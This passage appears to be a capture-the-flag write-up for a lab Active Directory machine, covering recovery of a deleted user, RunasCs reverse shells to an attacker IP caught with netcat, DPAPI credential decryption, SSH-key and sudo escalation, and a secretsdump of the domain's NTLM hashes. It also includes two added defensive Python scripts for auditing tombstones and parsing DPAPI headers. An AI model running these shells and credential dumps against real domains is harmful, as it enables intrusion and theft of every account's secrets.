Modified                        : 1/29/2025 4:44:42 AM
modifyTimeStamp                 : 1/29/2025 4:44:42 AM
Name                            : Deleted Objects
ObjectCategory                  : CN=Container,CN=Schema,CN=Configuration,DC=voleur,DC=htb
ObjectClass                     : container
ObjectGUID                      : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8
ProtectedFromAccidentalDeletion : 
sDRightsEffective               : 0
showInAdvancedViewOnly          : True
systemFlags                     : -1946157056
uSNChanged                      : 13005
uSNCreated                      : 5659
whenChanged                     : 1/29/2025 4:44:42 AM
whenCreated                     : 1/29/2025 12:42:27 AM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : voleur.htb/Deleted Objects/Todd Wolfe
                                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
CN                              : Todd Wolfe
                                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
codePage                        : 0
countryCode                     : 0
Created                         : 1/29/2025 1:08:06 AM
createTimeStamp                 : 1/29/2025 1:08:06 AM
Deleted                         : True
Description                     : Second-Line Support Technician
DisplayName                     : Todd Wolfe
DistinguishedName               : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted 
                                  Objects,DC=voleur,DC=htb
dSCorePropagationData           : {5/13/2025 4:11:10 PM, 1/29/2025 4:52:29 AM, 1/29/2025 4:49:29 AM, 1/29/2025 1:08:06 
                                  AM...}
givenName                       : Todd
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Second-Line Support Technicians,DC=voleur,DC=htb
lastLogoff                      : 0
lastLogon                       : 133826301603754403
lastLogonTimestamp              : 133826287869758230
logonCount                      : 3
memberOf                        : {CN=Second-Line Technicians,DC=voleur,DC=htb, CN=Remote Management 
                                  Users,CN=Builtin,DC=voleur,DC=htb}
Modified                        : 5/13/2025 4:11:17 PM
modifyTimeStamp                 : 5/13/2025 4:11:17 PM
msDS-LastKnownRDN               : Todd Wolfe
Name                            : Todd Wolfe
                                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : 
ObjectClass                     : user
ObjectGUID                      : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid                       : S-1-5-21-3927696377-1337352550-2781715495-1110
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133826280731790960
sAMAccountName                  : todd.wolfe
sDRightsEffective               : 0
sn                              : Wolfe
userAccountControl              : 66048
userPrincipalName               : todd.wolfe@voleur.htb
uSNChanged                      : 45088
uSNCreated                      : 12863
whenChanged                     : 5/13/2025 4:11:17 PM
whenCreated                     : 1/29/2025 1:08:06 AM



PS C:\Windows\system32>

We run Restore-ADObject with the user's ObjectGUID and confirm the restore with Get-ADUser.

PS C:\Windows\system32> Restore-ADObject -Identity "1c6b1deb-c372-4cbb-87b1-15031de169db"
PS C:\Windows\system32> Get-ADUser -Identity todd.wolfe


DistinguishedName : CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
Enabled           : True
GivenName         : Todd
Name              : Todd Wolfe
ObjectClass       : user
ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db
SamAccountName    : todd.wolfe
SID               : S-1-5-21-3927696377-1337352550-2781715495-1110
Surname           : Wolfe
UserPrincipalName : todd.wolfe@voleur.htb



PS C:\Windows\system32>
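The restore worked because the tombstone kept everything a live account needs: with the AD Recycle Bin enabled, a deleted user retains its password, userAccountControl and memberOf, so Restore-ADObject brings back an enabled account in Remote Management Users with the password noted in the spreadsheet. The audit script below is an added example written for this page, not the writeup's or Microsoft's code. It parses the key/value listing that Get-ADObject prints (a constructed sample modelled on the Todd Wolfe record above, plus a properly disabled leaver and the container object) and flags deleted users that would come back enabled or in a sensitive group; the userAccountControl bit values are the documented AD flags, the set of groups treated as sensitive is an assumption for the example.

```python
"""Audit tombstoned (deleted) user objects for 'restorable leaver' risk.

Added example (not part of the original writeup). Input is the Format-List
style text Get-ADObject prints; continuation lines start with whitespace
and records are separated by blank lines.
"""
import re

# Constructed sample modelled on the listing above. A raw string keeps the
# literal "\0ADEL" that AD puts into a tombstone's RDN.
SAMPLE_LISTING = r"""
accountExpires                  : 9223372036854775807
CanonicalName                   : voleur.htb/Deleted Objects/Todd Wolfe
                                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
Deleted                         : True
Description                     : Second-Line Support Technician
DistinguishedName               : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted
                                  Objects,DC=voleur,DC=htb
isDeleted                       : True
LastKnownParent                 : OU=Second-Line Support Technicians,DC=voleur,DC=htb
memberOf                        : {CN=Second-Line Technicians,DC=voleur,DC=htb, CN=Remote Management
                                  Users,CN=Builtin,DC=voleur,DC=htb}
ObjectClass                     : user
ObjectGUID                      : 1c6b1deb-c372-4cbb-87b1-15031de169db
sAMAccountName                  : todd.wolfe
userAccountControl              : 66048

Deleted                         : True
isDeleted                       : True
memberOf                        : {CN=Domain Users,CN=Users,DC=voleur,DC=htb}
ObjectClass                     : user
ObjectGUID                      : 00000000-0000-0000-0000-000000000002
sAMAccountName                  : old.contractor
userAccountControl              : 66050

Deleted                         : True
isDeleted                       : True
ObjectClass                     : container
ObjectGUID                      : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8
Name                            : Deleted Objects
"""

UAC_ACCOUNTDISABLE = 0x0002          # documented userAccountControl flags
UAC_DONT_EXPIRE_PASSWORD = 0x10000

# Assumption for this example: groups whose membership should never survive a leaver.
SENSITIVE_GROUPS = {"Remote Management Users", "Domain Admins", "Administrators",
                    "Backup Operators", "Account Operators"}

_KEY_LINE = re.compile(r"^(\S[^:]*?)\s*:\s?(.*)$")


def parse_format_list(text):
    """Parse Format-List output into a list of dict records."""
    records, current, last_key = [], {}, None
    for line in text.splitlines():
        if not line.strip():                       # blank line ends a record
            if current:
                records.append(current)
            current, last_key = {}, None
            continue
        m = _KEY_LINE.match(line)
        if m:                                      # 'Key : value' line
            last_key = m.group(1)
            current[last_key] = m.group(2).rstrip()
        elif last_key is not None:                 # wrapped continuation of the previous value
            current[last_key] = current[last_key] + " " + line.strip()
    if current:
        records.append(current)
    return records


def group_names(member_of):
    """'{CN=A,DC=x, CN=B,CN=Builtin,DC=x}' -> ['A', 'B'] (first RDN of each DN)."""
    if not member_of:
        return []
    dns = [d.strip() for d in member_of.strip("{}").split(", ")]
    return [d.split(",", 1)[0].split("=", 1)[1] for d in dns if "=" in d]


def risky_tombstones(text, sensitive=SENSITIVE_GROUPS):
    """Return deleted user accounts that are still enabled and/or still in a
    sensitive group: restoring one yields a live account with its old rights."""
    findings = []
    for rec in parse_format_list(text):
        if rec.get("ObjectClass") != "user" or rec.get("isDeleted") != "True":
            continue
        uac = int(rec.get("userAccountControl", "0"))
        enabled = not (uac & UAC_ACCOUNTDISABLE)
        groups = set(group_names(rec.get("memberOf"))) & sensitive
        if enabled or groups:
            findings.append({
                "sam": rec.get("sAMAccountName"),
                "guid": rec.get("ObjectGUID"),
                "enabled_on_restore": enabled,
                "password_never_expires": bool(uac & UAC_DONT_EXPIRE_PASSWORD),
                "sensitive_groups": sorted(groups),
                "restores_to": rec.get("LastKnownParent"),
            })
    return findings


if __name__ == "__main__":
    for f in risky_tombstones(SAMPLE_LISTING):
        print(f"[!] {f['sam']} ({f['guid']}): enabled={f['enabled_on_restore']}, "
              f"groups={f['sensitive_groups']}, restores to {f['restores_to']}")
```

The leaver process this points at is simple: disable the account and strip its group memberships before deleting it, and treat restore rights (the RESTORE_USERS path used here) as the privileged rights they are, since a restore of an enabled tombstone is equivalent to a new account creation with a known password.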

User - Todd Wolfe

With the password found in the XLSX we spawn a shell as Todd.

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe todd.wolfe NightT1meP1dg3on14 whoami
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

voleur\todd.wolfe
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe todd.wolfe NightT1meP1dg3on14 powershell.exe -r 10.10.14.76:1335
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-10f6c7$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4400 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

Todd belongs to the Second-Line Technicians group.

❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.76] from voleur.htb [10.10.11.76] 55384
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\todd.wolfe
PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID                                           
================= ==============================================
voleur\todd.wolfe S-1-5-21-3927696377-1337352550-2781715495-1110


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes                                        
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
VOLEUR\Second-Line Technicians             Group            S-1-5-21-3927696377-1337352550-2781715495-1113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Windows\system32>

The C:\IT\ directory contains three folders; Todd has access to Second-Line Support, which corresponds to the group of the same name.

*Evil-WinRM* PS C:\> dir C:\IT


    Directory: C:\IT


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         1/29/2025   1:40 AM                First-Line Support
d-----         1/29/2025   7:13 AM                Second-Line Support
d-----         1/30/2025   8:11 AM                Third-Line Support


*Evil-WinRM* PS C:\>

Windows Credential Manager

While exploring the directory we discover a DPAPI master key file and a Credential file.

PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> dir AppData\Roaming\Microsoft\Protect\
dir AppData\Roaming\Microsoft\Protect\


    Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-         1/29/2025   7:13 AM                S-1-5-21-3927696377-1337352550-2781715495-1110                       


PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> dir appdata\roaming\microsoft\credentials
dir appdata\roaming\microsoft\credentials


    Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\appdata\roaming\microsoft\credentials


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         1/29/2025   4:55 AM            398 772275FAD58525253490A9B0039791D3                                     


PS C:\IT\Second-Line Support\Archived Users\todd.wolfe>

We base64-encode the master key.

# master key
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88'))
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe>

And likewise the credential file.

# credential
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\IT\Second-Line Support\Archived Users\todd.wolfe\appdata\roaming\microsoft\credentials\772275FAD58525253490A9B0039791D3'))
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe>

We recreate both files locally.

echo AgAA[..]meBvmkT1RuqEZHHTpfWoKJFHs= |base64 -d > 08949382-134f-4c63-b93c-ce52efc0aa88
echo AQAAAIIBA[..]9mi4fsWOVfrBp0oItY= |base64 -d > 772275FAD58525253490A9B0039791D3
❯ ll
.rw-rw-r-- kali kali 740 B Sun Jul  6 03:28:12 2025  08949382-134f-4c63-b93c-ce52efc0aa88
.rw-rw-r-- kali kali 398 B Sun Jul  6 03:28:17 2025  772275FAD58525253490A9B0039791D3

DPAPI Secrets

We run impacket-dpapi with the masterkey action, specifying the master key file, the SID and the password, in this case Todd's.

❯ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

We run it again, this time with the credential action, specifying the file and the key. The credentials of jeremy.combs are revealed.

❯ impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m
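Both files carry a fixed-size header that can be validated before anything is decrypted, and the Credential blob records which master key protects it. The Python below is an added example, not code from the original writeup: it parses the master key file header, the Credential file wrapper and the DPAPI blob header, checks the declared sizes against the file length, and confirms that the blob references the master key used above. The sample bytes are constructed from the sizes and GUID shown in the impacket output, with zero filler in place of real key material.

```python
import struct
import uuid

# Fixed-size headers of the two artifacts, little-endian as stored on disk.
MK_HEADER = struct.Struct("<LLL72sLLLQQQQ")  # 128-byte master key file header
CRED_HEADER = struct.Struct("<LLL")          # credential file: version, blob size, reserved
BLOB_HEADER = struct.Struct("<L16sL16sLL")   # DPAPI blob: version, provider GUID, key version,
                                             # master key GUID, flags, description length
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")  # well-known provider GUID

def parse_masterkey_file(data: bytes) -> dict:
    """Read the master key file header and check that the four segment lengths
    add up to the file size, so a truncated or mislabelled file is caught early."""
    (version, _, _, guid_utf16, _, _, _,
     mk_len, bk_len, ch_len, dk_len) = MK_HEADER.unpack_from(data, 0)
    expected = MK_HEADER.size + mk_len + bk_len + ch_len + dk_len
    if len(data) != expected:
        raise ValueError(f"file is {len(data)} bytes but header implies {expected}")
    return {
        "version": version,
        "guid": uuid.UUID(guid_utf16.decode("utf-16le")),
        "masterkey_len": mk_len, "backupkey_len": bk_len,
        "credhist_len": ch_len, "domainkey_len": dk_len,
        # A non-empty DomainKey segment means the key is also escrowed to the
        # domain's DPAPI backup key; domain-level compromise recovers it as well.
        "domain_backed": dk_len > 0,
    }

def parse_credential_file(data: bytes) -> dict:
    """Read the Credential Manager wrapper and the DPAPI blob header inside it;
    the blob names the master key GUID that protects it."""
    version, blob_size, _ = CRED_HEADER.unpack_from(data, 0)
    blob = data[CRED_HEADER.size:]
    if len(blob) != blob_size:
        raise ValueError(f"blob is {len(blob)} bytes but wrapper says {blob_size}")
    (blob_version, provider, mk_version, mk_guid,
     flags, desc_len) = BLOB_HEADER.unpack_from(blob, 0)
    desc = blob[BLOB_HEADER.size:BLOB_HEADER.size + desc_len]
    return {
        "version": version, "blob_size": blob_size, "blob_version": blob_version,
        "provider_ok": uuid.UUID(bytes_le=provider) == DPAPI_PROVIDER,
        "masterkey_version": mk_version,
        "masterkey_guid": uuid.UUID(bytes_le=mk_guid),
        "flags": flags,
        "description": desc.decode("utf-16le").rstrip("\x00"),
    }

def credential_matches_masterkey(cred: bytes, mk: bytes) -> bool:
    """True when the credential blob was protected with this master key file."""
    return parse_credential_file(cred)["masterkey_guid"] == parse_masterkey_file(mk)["guid"]

# Constructed samples: header values copied from the impacket output above, segment
# bodies replaced with zero filler (no real key material or secrets are embedded).
MK_GUID = uuid.UUID("08949382-134f-4c63-b93c-ce52efc0aa88")

def build_sample_masterkey() -> bytes:
    lens = (136, 104, 0, 372)  # MasterKeyLen, BackupKeyLen, CredHistLen, DomainKeyLen
    header = MK_HEADER.pack(2, 0, 0, str(MK_GUID).encode("utf-16le"), 0, 0, 0, *lens)
    return header + b"\x00" * sum(lens)  # 128 + 612 = 740 bytes, the size listed above

def build_sample_credential() -> bytes:
    desc = "Local Credential Data\x00".encode("utf-16le")  # the usual description string
    blob = BLOB_HEADER.pack(1, DPAPI_PROVIDER.bytes_le, 1, MK_GUID.bytes_le, 0, len(desc)) + desc
    blob += b"\x00" * (386 - len(blob))  # pad to the 386-byte blob inside a 398-byte file
    return CRED_HEADER.pack(1, len(blob), 0) + blob

if __name__ == "__main__":
    mk, cred = build_sample_masterkey(), build_sample_credential()
    print(parse_masterkey_file(mk), parse_credential_file(cred), sep="\n")
    print("blob references this master key:", credential_matches_masterkey(cred, mk))
```

A header whose segment lengths do not sum to the file size is rejected, which is the first thing to check when the masterkey action fails on a file that was copied through base64.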

User - Jeremy.Combs

Knowing Jeremy's password, we run RunasCs.

*Evil-WinRM* PS C:\users\svc_winrm\documents> .\RunasCs.exe jeremy.combs qT3V9pLXyN7W4m powershell.exe -r 10.10.14.76:1335
[*] Warning: The logon for user 'jeremy.combs' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1ef3db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 6084 created in background.
*Evil-WinRM* PS C:\users\svc_winrm\documents>

We obtain a shell.

❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.76] from voleur.htb [10.10.11.76] 60232
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\jeremy.combs
PS C:\Windows\system32>

Jeremy belongs to the Third-Line Technicians group, so the directory of the same name under C:\IT is accessible to him.

Inside the directory we find a note indicating that WSL is present on the machine. The Backups\ directory is not accessible to this user.

PS C:\IT\Third-Line Support> dir


    Directory: C:\IT\Third-Line Support


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         1/30/2025   8:11 AM                Backups                                                              
-a----         1/30/2025   8:10 AM           2602 id_rsa                                                               
-a----         1/30/2025   8:07 AM            186 Note.txt.txt                                                         


PS C:\IT\Third-Line Support> cat Note.txt.txt
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin
PS C:\IT\Third-Line Support>

We also find a private key which, judging by its permissions, probably belongs to the svc_backup user.

PS C:\IT\Third-Line Support> icacls id_rsa
id_rsa NT AUTHORITY\SYSTEM:(I)(F)
       VOLEUR\Third-Line Technicians:(I)(RX)
       VOLEUR\Administrator:(I)(F)
       BUILTIN\Administrators:(I)(F)
       VOLEUR\svc_backup:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
PS C:\IT\Third-Line Support> cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqFyPMvURW/qbyRlemAMzaPVvfR7JNHznL6xDHP4o/hqWIzn3dZ66
P2absMgZy2XXGf2pO0M13UidiBaF3dLNL7Y1SeS/DMisE411zHx6AQMepj0MGBi/c1Ufi7
[...]
fosiR4pvDHtzbqPVbixqSP14oKRSeswpN1Q50OnD11tpIbesjH4ZVEXv7VY9/Z8VcooQLW
GSgUcaD+U9Ik13vlNrrZYs9uJz3aphY6Jo23+7nge3Ui7ADEvnD3PAtzclU3xMFyX9Gf+9
RveMEYlXZqvJ9PAAAADXN2Y19iYWNrdXBAREMBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
PS C:\IT\Third-Line Support>

User - svc_backup

With the private key, and specifying the port, we gain access over SSH.

❯ ssh -i id_rsa svc_backup@voleur.htb -p 2222
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul  6 10:35:00 PDT 2025

  System load:    0.52      Processes:             9
  Usage of /home: unknown   Users logged in:       0
  Memory usage:   47%       IPv4 address for eth0: 10.10.11.76
  Swap usage:     0%


363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Jul  6 09:51:05 2025 from 127.0.0.1
 * Starting OpenBSD Secure Shell server sshd
   ...done.
svc_backup@DC:~$ whoami;id;pwd
svc_backup
uid=1000(svc_backup) gid=1000(svc_backup) groups=1000(svc_backup),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev)
/home/svc_backup
svc_backup@DC:~$

This user can run any command as root.

svc_backup@DC:~$ sudo -l -l
Matching Defaults entries for svc_backup on DC:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User svc_backup may run the following commands on DC:

Sudoers entry:
    RunAsUsers: ALL
    RunAsGroups: ALL
    Commands:
	ALL

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
	ALL
svc_backup@DC:~$

Backups

After escalating to a privileged shell we find that Backups\ is accessible; it holds a copy of the Active Directory database together with the SECURITY and SYSTEM hives.

root@DC:/# ls -lahR /mnt/c/IT/'Third-Line Support'/Backups/
'/mnt/c/IT/Third-Line Support/Backups/':
total 0
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 08:11  .
dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 30 08:11  ..
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49  registry

'/mnt/c/IT/Third-Line Support/Backups/Active Directory':
total 25M
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup  24M Jan 30 03:49 ntds.dit
-rwxrwxrwx 1 svc_backup svc_backup  16K Jan 30 03:49 ntds.jfm

'/mnt/c/IT/Third-Line Support/Backups/registry':
total 18M
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup  32K Jan 30 03:30 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup  18M Jan 30 03:30 SYSTEM
root@DC:/#

We pack the directory into a .tar archive.

root@DC:/# tar -cvf /home/svc_backup/Backups.tar "/mnt/c/IT/Third-Line Support/Backups/"
tar: Removing leading `/' from member names
/mnt/c/IT/Third-Line Support/Backups/
/mnt/c/IT/Third-Line Support/Backups/Active Directory/
/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit
/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.jfm
/mnt/c/IT/Third-Line Support/Backups/registry/
/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY
/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM
root@DC:/# ls -lah /home/svc_backup/Backups.tar
-rw-r--r-- 1 root root 42M Jul  6 10:43 /home/svc_backup/Backups.tar
root@DC:/#

We copy it over with scp.

❯ scp -P 2222 -i id_rsa svc_backup@voleur.htb:/home/svc_backup/Backups.tar $(pwd)
Backups.tar                                                                                                                                           100%   42MB   1.3MB/s   00:33    

Dump Hashes

We run impacket-secretsdump with the SYSTEM, SECURITY and ntds.dit files and obtain the hashes of all users, including administrator.

❯ impacket-secretsdump -system registry/SYSTEM -security registry/SECURITY -ntds Active\ Directory/ntds.dit local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM 
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from Active Directory/ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
